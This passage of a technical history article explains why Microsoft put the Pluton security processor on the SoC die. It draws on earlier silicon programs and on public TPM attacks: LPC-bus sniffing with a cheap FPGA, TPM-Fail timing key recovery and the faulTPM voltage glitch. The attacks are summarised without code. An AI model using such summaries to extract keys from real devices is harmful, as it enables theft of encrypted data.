&lt;p&gt;Hunt, George Letey, and Edmund Nightingale published &lt;em&gt;The Seven Properties of Highly Secure Devices&lt;/em&gt; as Microsoft Research Technical Report MSR-TR-2017-16 in March 2017 [@msr-2017-seven-properties]. The paper makes a single normative claim: &lt;em&gt;&quot;This paper makes two contributions to the field of device security. First, we identify seven properties we assert are required in all highly secure devices&quot;&lt;/em&gt; [@msr-2017-seven-properties]. The seven are: hardware-based root of trust, small trusted computing base, defense in depth, compartmentalisation, certificate-based authentication, &lt;em&gt;renewable security&lt;/em&gt;, and failure reporting. Property #6 is the one the rest of this article turns on. &lt;em&gt;Renewable security via online firmware updates&lt;/em&gt; is precisely the property that distinguishes Pluton-on-PC from a 2014 dTPM. The chip is allowed to be wrong, as long as the chip can be made right again, fast.&lt;/p&gt;

A 2017 Microsoft Research framework (Hunt, Letey, Nightingale; MSR-TR-2017-16) listing the architectural properties any &quot;highly secure device&quot; must satisfy: hardware-based root of trust, small TCB, defense in depth, compartmentalisation, certificate-based authentication, *renewable security via online updates*, and failure reporting [@msr-2017-seven-properties]. Renewable security is the property the Pluton-on-PC update path operationalises; it also names the new trust the program places in Microsoft.
&lt;h3&gt;November 9, 2017 -- Project Cerberus&lt;/h3&gt;
&lt;p&gt;Microsoft introduced Project Cerberus at DCD&amp;gt;Zettastructure in London on November 8, 2017 [@siliconangle-2017-cerberus]. Kushagra Vaid, then Microsoft Azure GM, described the architecture as &lt;em&gt;&quot;a cryptographic microcontroller running secure code which intercepts accesses from the host to flash over the SPI bus (where firmware is stored), so it can continuously measure and attest these accesses to ensure firmware integrity&quot;&lt;/em&gt; [@siliconangle-2017-cerberus]. Microsoft contributed a five-PDF specification set to OCP under Project Olympus [@ocp-cerberus]: Architecture Overview, Challenge Protocol, Firmware Update, Host Processor Firmware Requirements, and Processor Cryptography. The reference implementation lives at &lt;code&gt;Azure/Project-Cerberus&lt;/code&gt; on GitHub [@azure-cerberus-github] -- platform-agnostic core, FreeRTOS and Linux ports, &lt;em&gt;&quot;designed to be a hardware root of trust (RoT) for server platforms&quot;&lt;/em&gt; [@azure-cerberus-github]. Microsoft Learn describes Cerberus as &lt;em&gt;&quot;a NIST 800-193 compliant hardware root-of-trust with an identity that cannot be cloned&quot;&lt;/em&gt; [@ms-learn-cerberus] [@nist-sp-800-193]. This was Microsoft&apos;s first public commitment to publishing a hardware-RoT design and to running it in production at fleet scale.&lt;/p&gt;
&lt;p&gt;Cerberus matters here for what it &lt;em&gt;cannot&lt;/em&gt; do, not what it can. It is a discrete chip. It needs board area, a BOM line, and per-OEM design-in cost. It works on a $20,000 server motherboard. It does not work on a $700 ultrabook -- and putting it on one would reintroduce the very external-bus surface that Andzakovic 2019 showed to be sniffable [@andzakovic-2019-tpm-sniffing]. Cerberus solves the server problem definitively. It does not solve the PC problem, and its existence makes the PC-side need explicit.&lt;/p&gt;
&lt;h3&gt;April 16, 2018 -- Azure Sphere preview at RSA 2018&lt;/h3&gt;
&lt;p&gt;Hunt&apos;s announcement of Azure Sphere at the 2018 RSA Conference is the first public, named appearance of &quot;Pluton.&quot; The Azure Blog launch post promised &lt;em&gt;&quot;custom silicon security technology from Microsoft, inspired by 15 years of experience and learnings from Xbox, to secure this new class of MCUs and the devices they power&quot;&lt;/em&gt; [@azure-blog-2018-azure-sphere]. The companion &lt;em&gt;Anatomy of a Secured MCU&lt;/em&gt; post is the first technical description: &lt;em&gt;&quot;our Pluton Security Subsystem is the heart of our security story&quot;&lt;/em&gt; [@azure-blog-anatomy-secured-mcu]. Three components, one trust anchor: the MediaTek MT3620 MCU with the Pluton subsystem on die; the Microsoft-managed Linux-based Azure Sphere OS; and the Azure Sphere Security Service (AS3) cloud, which signed firmware updates and consumed device attestations. Wikipedia records the general-availability date as February 24, 2020 [@wikipedia-azure-sphere], also describing Pluton as &lt;em&gt;&quot;a Microsoft-designed security subsystem that implements a hardware-based root of trust for Azure Sphere&quot;&lt;/em&gt; [@wikipedia-azure-sphere].&lt;/p&gt;

Each chip includes custom silicon security technology from Microsoft, inspired by 15 years of experience and learnings from Xbox, to secure this new class of MCUs and the devices they power. -- Galen Hunt, Azure Blog, April 16, 2018 [@azure-blog-2018-azure-sphere]
&lt;p&gt;By April 2018, Microsoft had three architectural pieces in production. Xbox One proved the on-die security processor. Project Cerberus proved that Microsoft could publish an open RoT design and operate the back end at hyperscale. Azure Sphere proved that the Pluton block could be licensed onto a third-party SoC, attested to a Microsoft-operated cloud service, and serviced over the air. &lt;em&gt;None of those three pieces was on a Windows PC.&lt;/em&gt;&lt;/p&gt;

flowchart LR
    Xbox[Xbox One 2013&lt;br /&gt;on-die security processor&lt;br /&gt;console form factor]
    Sopris[Project Sopris 2015&lt;br /&gt;4 MB RAM + 4 MB Flash&lt;br /&gt;research prototype]
    Seven[Seven Properties 2017&lt;br /&gt;MSR-TR-2017-16&lt;br /&gt;renewable security]
    Cerberus[Project Cerberus 2017&lt;br /&gt;discrete RoT&lt;br /&gt;server BMC]
    Sphere[Azure Sphere 2018&lt;br /&gt;Pluton-on-MCU&lt;br /&gt;MediaTek MT3620]
    PC[Pluton-on-PC 2020&lt;br /&gt;general-purpose Windows PC]
    Xbox --&amp;gt; Seven
    Sopris --&amp;gt; Seven
    Seven --&amp;gt; Sphere
    Xbox --&amp;gt; Sphere
    Cerberus --&amp;gt; PC
    Sphere --&amp;gt; PC
&lt;p&gt;Microsoft had a working architecture by 2018. Why did it take until November 17, 2020 to put it on a PC, and what changed between 2018 and 2020 that made the PC mandatory?&lt;/p&gt;
&lt;h2&gt;3. The threat model that closed every other door (2019-2024)&lt;/h2&gt;
&lt;p&gt;The answer to &quot;what changed between 2018 and 2020&quot; is that, between 2019 and 2024, every alternative architecture for &lt;em&gt;where the TPM lives&lt;/em&gt; was systematically broken in public. Not by intention. By research. By the time Microsoft made the November 17, 2020 announcement, Pluton-on-PC was the only architectural option that simultaneously closed the bus, contained the TEE blast radius, and gave Microsoft a fast firmware-patch path. This section is the prior article&apos;s section 5, recast as the story Microsoft was watching unfold while the Pluton design was being prepared for PC.&lt;/p&gt;
&lt;h3&gt;March 13, 2019 -- Andzakovic&apos;s $40 LPC sniffer&lt;/h3&gt;
&lt;p&gt;Denis Andzakovic, working at Pulse Security, published an end-to-end attack on the Trusted Boot path of an HP business laptop [@andzakovic-2019-tpm-sniffing]. A NZ$40 iCE40 FPGA, seven wires (LFRAME, LAD0-LAD3, LCLK, GND) soldered to the LPC bus between the CPU and the discrete TPM, the BitLocker Volume Master Key falling off the wire in plaintext during boot. The prior article walks the bit-level details. What matters here is that the November 17, 2020 Pluton announcement names this attack class as motivation: &lt;em&gt;&quot;attackers have begun to innovate ways to attack [the TPM], particularly in situations where an attacker can ... gain physical access to a PC ... target[ing] the communication channel between the CPU and TPM&quot;&lt;/em&gt; [@ms-pluton-blog-2020]. Discrete TPM as a class is broken against a determined adversary with physical access. The bus is the surface.&lt;/p&gt;
&lt;h3&gt;November 12, 2019 -- TPM-Fail&lt;/h3&gt;
&lt;p&gt;Daniel Moghimi and colleagues published &lt;em&gt;TPM-Fail&lt;/em&gt; later in 2019 [@tpmfail-microsite]: timing side channels in the ECDSA implementation in Intel PTT (CVE-2019-11090) and the STMicro ST33 dTPM (CVE-2019-16863). Local key recovery in 4-20 minutes; remote, over the network, in approximately 5 hours. The fixes shipped as firmware patches. The lesson Microsoft took from TPM-Fail is not in the bug, it is in the &lt;em&gt;deploy mechanism&lt;/em&gt;. PTT lives in CSME; CSME ships through the OEM&apos;s UEFI capsule path. ST33 lives behind the TPM vendor&apos;s signed flash and ships through the OEM&apos;s UEFI capsule path. The OEM UEFI capsule path is measured in quarters to years for high-volume client OEMs. &lt;em&gt;A fix existed but the deploy mechanism was insufficient.&lt;/em&gt; This is the architectural lesson that the next generation has to internalise: the patch path is part of the security property.The deploy-mechanism lesson is the one that gets quietly swallowed into Pluton&apos;s design. The bug count in firmware-TPM territory is not zero; it is steady. What changes is whether a fix can reach the fleet before its dwell time becomes a procurement problem. TPM-Fail&apos;s structural lesson is therefore not &quot;ECDSA timing leaks&quot; -- it is &quot;the channel that delivers the fix is the security property that matters.&quot;&lt;/p&gt;
&lt;h3&gt;April 28, 2023 -- faulTPM&lt;/h3&gt;
&lt;p&gt;Hans Niklas Jacob, Christian Werling, Robert Buhren, and Jean-Pierre Seifert published &lt;em&gt;faulTPM: Exposing AMD fTPMs Deepest Secrets&lt;/em&gt; at IEEE EuroS&amp;amp;P 2023 [@jacob-2023-faultpm]. &lt;em&gt;&quot;In this paper, we analyze a new class of attacks against fTPMs: Attacking their Trusted Execution Environment can lead to a full TPM state compromise. We experimentally verify this attack by compromising the AMD Secure Processor&quot;&lt;/em&gt; [@jacob-2023-faultpm]. The mechanism: a voltage glitch on the SVI2 power-management bus, against the AMD PSP (an ARM TrustZone Cortex-A5 inside modern Ryzen SoCs [@wikipedia-amd-psp]), in 2-3 hours of physical access. The output: the entire fTPM internal state, including the EK and any sealed material.&lt;/p&gt;
&lt;p&gt;The structural failure in faulTPM is not the glitch. It is that the PSP is a &lt;em&gt;shared&lt;/em&gt; TEE. The same coprocessor that runs the fTPM service also runs SEV memory-encryption setup, secure-boot enforcement, and platform initialisation. One fault drops everything. &lt;em&gt;Shared-TEE fTPM is broken because the TEE is shared.&lt;/em&gt; The architectural conclusion that this forces is hard: a fTPM that lives next to memory-encryption services, alongside boot-policy enforcement, in a coprocessor that also handles fuse provisioning, is not separable in failure. To restore TEE isolation, you need a &lt;em&gt;dedicated&lt;/em&gt; TEE.&lt;/p&gt;
&lt;h3&gt;The architecture cascade&lt;/h3&gt;
&lt;p&gt;Three results in five years close every architectural option Microsoft had on the PC.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Realization&lt;/th&gt;
&lt;th&gt;Structural failure&lt;/th&gt;
&lt;th&gt;First public proof&lt;/th&gt;
&lt;th&gt;What survives the failure&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Discrete TPM (LPC / SPI)&lt;/td&gt;
&lt;td&gt;External bus is sniffable&lt;/td&gt;
&lt;td&gt;Andzakovic 2019 [@andzakovic-2019-tpm-sniffing]&lt;/td&gt;
&lt;td&gt;Hardened dTPM with encrypted bus (TPM 2.0 ENC sessions); not retrofittable to existing fleets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel PTT in CSME&lt;/td&gt;
&lt;td&gt;Slow OEM UEFI capsule patch path&lt;/td&gt;
&lt;td&gt;TPM-Fail 2019 [@tpmfail-microsite]&lt;/td&gt;
&lt;td&gt;The cryptographic primitive; not the deploy channel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMD fTPM in PSP&lt;/td&gt;
&lt;td&gt;Shared TEE -- one fault drops everything&lt;/td&gt;
&lt;td&gt;faulTPM 2023 [@jacob-2023-faultpm]&lt;/td&gt;
&lt;td&gt;The compatibility surface; not the secrets the chip held&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pluton on the SoC die&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;(subject of sections 5-8)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The reasoning chain that lands the design is short. dTPM is broken because the bus is sniffable. Shared-TEE fTPM is broken because the TEE is shared. Therefore: dedicated TEE on the SoC die, with a deploy channel that is not the OEM UEFI capsule. That is Pluton-on-PC. &lt;em&gt;On-die&lt;/em&gt; is not a Microsoft engineering preference. It is the only shape left after every other architecture has been broken in public.&lt;/p&gt;

flowchart TD
    dTPM[Discrete TPM&lt;br /&gt;external LPC/SPI bus]
    PTT[Intel PTT&lt;br /&gt;fTPM inside CSME]
    fTPM[AMD fTPM&lt;br /&gt;fTPM inside PSP]
    AND[Andzakovic 2019&lt;br /&gt;\$40 FPGA bus sniff]
    TF[TPM-Fail 2019&lt;br /&gt;5-hour ECDSA recovery]
    FT[faulTPM 2023&lt;br /&gt;SVI2 voltage glitch]
    Forced[On-die dedicated TEE&lt;br /&gt;OS-channel update path&lt;br /&gt;= Pluton-on-PC]
    dTPM --&amp;gt; AND
    PTT --&amp;gt; TF
    fTPM --&amp;gt; FT
    AND --&amp;gt; Forced
    TF --&amp;gt; Forced
    FT --&amp;gt; Forced
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; By 2024, all three production options for the TPM realization had been defeated by public research. dTPM by the bus surface (Andzakovic 2019). Intel PTT by the patch latency of CSME (TPM-Fail 2019). AMD fTPM by the shared-TEE blast radius (faulTPM 2023). On-die is not an aesthetic choice; it is the only architectural shape left after every other option has been demonstrably broken. The &quot;Pluton design&quot; is the negative space these three results leave behind.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If Microsoft had a working on-die-RoT architecture as early as 2013, and the threat model demanded it on PC by 2020, why did Microsoft go through Cerberus and Azure Sphere first? What did each generation contribute that the previous one could not?&lt;/p&gt;
&lt;h2&gt;4. Five generations of Microsoft security silicon&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s path to Pluton-on-PC was not linear. The architecture took shape across five generations of Microsoft security silicon -- three direct predecessors, the PC deployment itself, and one parallel path. Each generation contributed a piece the next one needed. The shape of Pluton-on-PC was determined by what Xbox One &lt;em&gt;was&lt;/em&gt;, what Cerberus &lt;em&gt;could not be on a client&lt;/em&gt;, what Azure Sphere &lt;em&gt;proved at scale&lt;/em&gt;, and what Caliptra &lt;em&gt;would later make visible as a choice rather than a technical necessity&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This article counts Microsoft on-die security-silicon programs (Generations 3-7 = Xbox One, Cerberus, Azure Sphere Pluton, Pluton-on-PC, Caliptra). The prior article counts TPM realisations (Generations 1-3 = standalone hardware TPM, firmware TPM, on-die TPM) [@prior-tpm-in-windows]. The two schemes share an index space but count different things. Project Cerberus appears as Generation 4 here even though it is &lt;em&gt;discrete&lt;/em&gt; (not on-die), because the count is over Microsoft security-silicon programs, not over TPM realisations.&lt;/p&gt;
&lt;/blockquote&gt;

A hardware element that anchors three separable services: Root of Trust for Storage (the chip can hold private keys that never leave it), Root of Trust for Reporting (the chip can sign attestations of its own state and of code it measured), and Root of Trust for Measurement (the chip records integrity hashes of code as it loads). The TPM 2.0 specification names all three; Pluton, Apple SEP, Caliptra, and OpenTitan implement subsets and combinations of them.
&lt;h3&gt;Generation 3 -- Xbox One on-die security processor (2013)&lt;/h3&gt;
&lt;p&gt;Existence proof. Microsoft and AMD co-designed the Xbox One SoC with an on-die security subsystem [@ms-pluton-blog-2020]. Console signing key. Hardware-enforced separation between Game OS and System OS. The Xbox One demonstrated, at consumer-console scale, that Microsoft and a chip vendor could ship an on-die security processor that survived a determined adversary with full physical access. Limitation: console-only. No TCG TPM 2.0 wire surface. Microsoft did not commit publicly that this design would ever leave the Xbox.&lt;/p&gt;
&lt;h3&gt;Generation 4 -- Project Cerberus (November 9, 2017)&lt;/h3&gt;
&lt;p&gt;Discrete RoT chip on the server BMC. NIST SP 800-193 alignment [@ms-learn-cerberus] [@nist-sp-800-193]. Open spec at OCP [@ocp-cerberus]; reference implementation on GitHub [@azure-cerberus-github]. Architecturally the inverse of Pluton: external chip, separate flash interception, dedicated authority. &lt;em&gt;That&lt;/em&gt; shape is right for a server motherboard. &lt;em&gt;That&lt;/em&gt; shape is wrong for a $700 ultrabook -- BOM cost, board area, and per-OEM design-in cost rule it out, and reintroducing an external bus would re-expose the very Andzakovic-class surface the program is trying to close. Cerberus is not a rejected design; it is the &lt;em&gt;server-side&lt;/em&gt; answer that runs alongside the client-side answer Pluton would later be. The two coexist in the November 17, 2020 announcement, which describes Cerberus as &lt;em&gt;&quot;providing a secure identity for the CPU that can be attested by Cerberus&quot;&lt;/em&gt; [@ms-pluton-blog-2020]. Server-side RoT and client-side RoT compose; they do not compete.&lt;/p&gt;
&lt;h3&gt;Generation 5 -- Azure Sphere Pluton MCU (April 2018)&lt;/h3&gt;
&lt;p&gt;The first public, named appearance of &quot;Pluton.&quot; MediaTek MT3620 SoC; Linux-based MCU OS; Azure Sphere Security Service in the cloud [@azure-blog-2018-azure-sphere] [@azure-blog-anatomy-secured-mcu]. &lt;em&gt;&quot;Our Pluton Security Subsystem is the heart of our security story&quot;&lt;/em&gt; [@azure-blog-anatomy-secured-mcu]. Three things became operationally proven in this generation. First, Microsoft-designed on-die security IP could be licensed to a third-party SoC and taped out under another vendor&apos;s process. Second, Microsoft-operated cloud-side firmware servicing was viable at MCU scale. Third, the &lt;em&gt;Seven Properties&lt;/em&gt; mapped cleanly onto the silicon-plus-firmware-plus-cloud triple. Limitation: MCU-class power and instruction set; not Windows; product retiring in 2027.The precision matters. The &lt;em&gt;design pattern&lt;/em&gt; -- on-die security processor, Microsoft-signed firmware, cloud or OS-channel updates -- dates to Xbox One in 2013. The &lt;em&gt;name&lt;/em&gt; &quot;Pluton&quot; first appears publicly in the April 2018 &lt;em&gt;Anatomy of a Secured MCU&lt;/em&gt; Azure Blog post [@azure-blog-anatomy-secured-mcu]. The 2020 PC announcement uses the name retroactively for the 2013 design. When narrating: the design is Xbox-era, the name is Azure-Sphere-era.&lt;/p&gt;
&lt;h3&gt;Generation 6 -- Pluton on Windows-PC SoCs (November 17, 2020)&lt;/h3&gt;
&lt;p&gt;The subject of section 5. Brief hand-off here. Microsoft, AMD, Intel, and Qualcomm announced that the Pluton design would ship on Windows-PC SoCs [@ms-pluton-blog-2020]. AMD Ryzen 6000 was the first Pluton silicon to reach market, announced at CES 2022 with OEM systems shipping later that year [@phoronix-2022-amd-ryzen-pluton]. Microsoft Learn currently lists AMD Ryzen 6000 / 7000 / 8000 / 9000 / Ryzen AI; Intel Core Ultra 200V Series, Ultra Series 3, and Series 3; and Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series [@ms-learn-pluton]. This is the generation the rest of the article lives in.&lt;/p&gt;
&lt;h3&gt;Generation 7 -- Caliptra 1.0 (April 2024)&lt;/h3&gt;
&lt;p&gt;Open-source datacenter Root of Trust. Co-designed by Microsoft, Google, AMD, and NVIDIA. Specification, RTL, ROM, and runtime all public on CHIPS Alliance [@caliptra-github] [@caliptra-spec]. &lt;em&gt;&quot;Caliptra targets datacenter-class SoCs like CPUs, GPUs, DPUs, TPUs. It is the specification, silicon logic, ROM and firmware for implementing a Root of Trust for Measurement (RTM) block inside an SoC&quot;&lt;/em&gt; [@caliptra-github]. Caliptra is not a successor to Pluton. It is a &lt;em&gt;parallel path&lt;/em&gt;, and that distinction is what makes Caliptra structurally important for this article: it makes the single-signer choice in Pluton visible as a choice, not a technical necessity. Caliptra exists. The single-signer property of Pluton-on-PC is therefore not the only design that 2024 hardware can support; it is the one Microsoft chose for the client.&lt;/p&gt;
&lt;p&gt;The five generations side by side:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;On-die?&lt;/th&gt;
&lt;th&gt;Discrete?&lt;/th&gt;
&lt;th&gt;Open RTL?&lt;/th&gt;
&lt;th&gt;Multi-signer?&lt;/th&gt;
&lt;th&gt;Trust anchor&lt;/th&gt;
&lt;th&gt;Where it ships&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;3 -- Xbox One sec proc&lt;/td&gt;
&lt;td&gt;2013&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Microsoft (Xbox CA)&lt;/td&gt;
&lt;td&gt;Xbox One console&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 -- Project Cerberus&lt;/td&gt;
&lt;td&gt;2017&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (spec/RI)&lt;/td&gt;
&lt;td&gt;No (per-deployment signer)&lt;/td&gt;
&lt;td&gt;Microsoft Azure CA (operator)&lt;/td&gt;
&lt;td&gt;Server BMC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5 -- Azure Sphere Pluton&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Microsoft (AS3)&lt;/td&gt;
&lt;td&gt;MCU (MediaTek MT3620)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6 -- Pluton-on-PC&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Microsoft (Windows Update)&lt;/td&gt;
&lt;td&gt;Windows 11 client SoCs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7 -- Caliptra 1.0&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Multi-vendor by deployment&lt;/td&gt;
&lt;td&gt;Per-chip integrator&lt;/td&gt;
&lt;td&gt;Datacenter SoCs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TD
    Gen3[Gen 3: Xbox One 2013&lt;br /&gt;existence proof at scale]
    Gen4[Gen 4: Cerberus 2017&lt;br /&gt;open spec + NIST 800-193]
    Gen5[Gen 5: Azure Sphere 2018&lt;br /&gt;Pluton-on-MCU + cloud servicing]
    Gen6[Gen 6: Pluton-on-PC 2020&lt;br /&gt;TCG TPM 2.0 surface + Windows Update]
    Gen7[Gen 7: Caliptra 2024&lt;br /&gt;open-source datacenter RoT]
    Gen3 --&amp;gt;|console-only existence| Gen5
    Gen3 --&amp;gt;|client-side&lt;br /&gt;architecture| Gen6
    Gen4 --&amp;gt;|server-side&lt;br /&gt;composes with Gen 6| Gen6
    Gen4 --&amp;gt;|open governance&lt;br /&gt;refined into| Gen7
    Gen5 --&amp;gt;|MCU-scale to PC-scale| Gen6
    Gen6 -.parallel path.-&amp;gt; Gen7
&lt;p&gt;What, exactly, makes Generation 6 different from the four generations that came before it -- and what new trust does each of its design choices ask the reader to place in Microsoft?&lt;/p&gt;
&lt;h2&gt;5. The breakthrough -- on-die plus dedicated TEE plus Rust plus Windows Update&lt;/h2&gt;
&lt;p&gt;The November 17, 2020 announcement [@ms-pluton-blog-2020] is shorter than its consequences suggest. It makes four design choices explicit. Each one closes a specific architectural gap that 2014-2024 had opened. Each one also names a new trust that is now placed in Microsoft. This section walks the four choices, the gap each one closes, and the trust each one creates.&lt;/p&gt;
&lt;h3&gt;Design choice 1 -- on-die SoC integration&lt;/h3&gt;
&lt;p&gt;There is no off-package bus between the CPU and the Pluton block. The November 2020 announcement names this property as the structural answer to the bus-sniffing class: &lt;em&gt;&quot;attackers have begun to innovate ways to attack [the TPM], particularly in situations where an attacker can ... gain physical access to a PC ... target[ing] the communication channel between the CPU and TPM&quot;&lt;/em&gt; [@ms-pluton-blog-2020]. With Pluton, that communication channel is silicon, not a board trace. Andzakovic-class attacks have nothing to attack [@andzakovic-2019-tpm-sniffing].&lt;/p&gt;
&lt;p&gt;The new trust: the silicon supply chain. Microsoft licenses the IP block; AMD, Intel, and Qualcomm tape it out on TSMC or another foundry; the OEM integrates the resulting SoC into a finished product. None of those steps is on the public record at the bit level. (See open problem 5 in section 9 -- supply-chain integrity beyond firmware signing.)&lt;/p&gt;
&lt;h3&gt;Design choice 2 -- dedicated TEE, not shared&lt;/h3&gt;
&lt;p&gt;Pluton is &lt;em&gt;not&lt;/em&gt; the same coprocessor that runs SEV memory encryption (AMD) or CSME runtime services (Intel). It is a separate block on the SoC die, with its own ROM, its own firmware, and its own boundary. faulTPM-class attacks on the AMD PSP do not transitively drop Pluton secrets [@jacob-2023-faultpm], because Pluton is not running inside the PSP. The structural failure that defeated AMD fTPM -- one fault drops everything because the TEE is shared -- does not apply to Pluton-as-Pluton. (AMD-Ryzen-6000-class chips can ship Pluton silicon next to the existing PSP-based fTPM; the OEM picks which the host advertises as the system TPM via the Pluton (HSP) BIOS toggle and PSP-directory 0xB BIT36 soft fuse Garrett 2022 documents [@garrett-2022-pluton-rev]. Windows TBS exposes one TPM at a time. On systems the OEM exposes as fTPM, faulTPM-class attacks remain valid; on systems exposed as Pluton-as-TPM they no longer reach the chip&apos;s secret state.)&lt;/p&gt;
&lt;p&gt;The new trust: Microsoft&apos;s chip-level isolation engineering. The TEE is dedicated only because Microsoft and the chip vendor agreed to dedicate it. There is no public peer-reviewed audit demonstrating that the Pluton boundary is bit-for-bit non-shared with PSP / CSME on shipping silicon. The independent CHES 2024 study TPMScan [@tpmscan-2024] [@tpmscan-iacr] sampled 78 TPM 2.0 versions across 6 vendors, and the IACR TCHES record states explicitly that the corpus &lt;em&gt;&quot;include[s] recent Pluton-based iTPMs&quot;&lt;/em&gt; alongside dTPM, fTPM, and earlier iTPM variants from Microsoft, AMD, Intel, Infineon, ST, and Nuvoton [@tpmscan-iacr]. The paper&apos;s per-vendor findings centre on RSA / ECDSA nonce-leakage and command-timing observability across the corpus; the paper does not single Pluton out for a per-implementation audit, and it does not characterise Pluton&apos;s specific timing surface as worse or better than the iTPM cohort it sits in. The TPMScan study therefore &lt;em&gt;places&lt;/em&gt; Pluton inside the audited iTPM population without singling it out -- a useful baseline, not a Pluton-specific clean bill of health.&lt;/p&gt;
&lt;h3&gt;Design choice 3 -- Microsoft-authored Rust firmware&lt;/h3&gt;
&lt;p&gt;Microsoft Learn states it explicitly: &lt;em&gt;&quot;Pluton platforms in 2024 AMD and Intel systems will start to use a Rust-based firmware foundation given the importance of memory safety&quot;&lt;/em&gt; [@ms-learn-pluton]. Memory-safe firmware is a direct response to the firmware-CVE history -- TPM-Fail [@tpmfail-microsite], the long Intel ME / AMD PSP CVE backlog, and CVE-2025-2884 (worked example in section 8 below). The class of bug that a memory-safe runtime structurally rules out is large; it is not the entirety of the bug surface (logic bugs survive Rust), but it is the part that has driven the CVE economy in firmware-TPM territory for a decade.&lt;/p&gt;

Microsoft Learn commits to *&quot;a Rust-based firmware foundation&quot;* on 2024+ AMD and Intel platforms [@ms-learn-pluton]. Secondary technology press has named the runtime as Tock OS, the memory-safe embedded operating system maintained by an open community [@tock-github]. Tock is a plausible candidate -- it is the most mature publicly reviewed memory-safe embedded RTOS for the kind of constraints Pluton operates under. But Microsoft has not made the Tock attribution publicly. The honest reading is: Rust on the PC firmware path is committed; the specific runtime has not been named by Microsoft as of 2026. The reader who wants to track this should watch the Microsoft Learn Pluton page for an explicit runtime name.&lt;p&gt;The reason this hedge matters: &quot;Pluton runs Tock&quot; is widely repeated in tech press, and the difference between &quot;memory-safe Rust embedded OS&quot; and &quot;specifically Tock&quot; is the difference between an architectural commitment and a procurement choice. Both are interesting, but they are not the same statement.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Garrett&apos;s April 2022 reverse-engineering [@garrett-2022-pluton-rev] documented that the Pluton firmware blob on the 2022 AMD Ryzen 6000 BIOS he disassembled was an ARM image derived from the TCG TPM 2.0 reference code (section 6 carries the verbatim quote and section 8 carries the CVE-2025-2884 connection). That is the 2022 firmware on a 2022-vintage chip; it is not the 2024+ Rust runtime. Both observations are consistent: the 2022 ARM blob is what existed on the first silicon, and the 2024+ Rust runtime is what Microsoft Learn now commits to. CVE-2025-2884 (section 8) reaches this firmware exactly through the TPM 2.0 reference-code derivation Garrett identified.&lt;/p&gt;
&lt;p&gt;The new trust: Microsoft&apos;s compiler and SDLC. The chip ships running code that Microsoft authored. Whatever the compiler optimised away, whatever the test suite did not catch, whatever subtle un-&lt;code&gt;unsafe&lt;/code&gt;-block reasoning passed code review -- that becomes the property of the chip&apos;s trust anchor.&lt;/p&gt;
&lt;h3&gt;Design choice 4 -- Windows Update servicing path&lt;/h3&gt;
&lt;p&gt;Microsoft Learn: &lt;em&gt;&quot;Pluton platform supports loading new firmware delivered through operating system updates&quot;&lt;/em&gt; [@ms-learn-pluton]. The change in shape is this: from quarters-to-years (the OEM UEFI capsule rollout that TPM-Fail had to crawl through) to days-to-weeks (the Patch Tuesday cadence that already delivers Windows kernel updates to roughly 1.4 billion endpoints, the deployment scale Microsoft itself reports for Windows monthly active devices). Microsoft has not published a numerical SLA for Pluton firmware delivery; this article will not assert one. The change in &lt;em&gt;channel&lt;/em&gt; is the architectural fact.&lt;/p&gt;
&lt;p&gt;The new trust: Microsoft&apos;s signing key and Windows Update infrastructure. Whoever can sign for the Windows Update channel can, in principle, push firmware to every Pluton chip the channel reaches. This is the same trust that already underwrites the rest of Windows; Pluton extends it to the chip itself.&lt;/p&gt;
&lt;h3&gt;The trust shift, named explicitly&lt;/h3&gt;
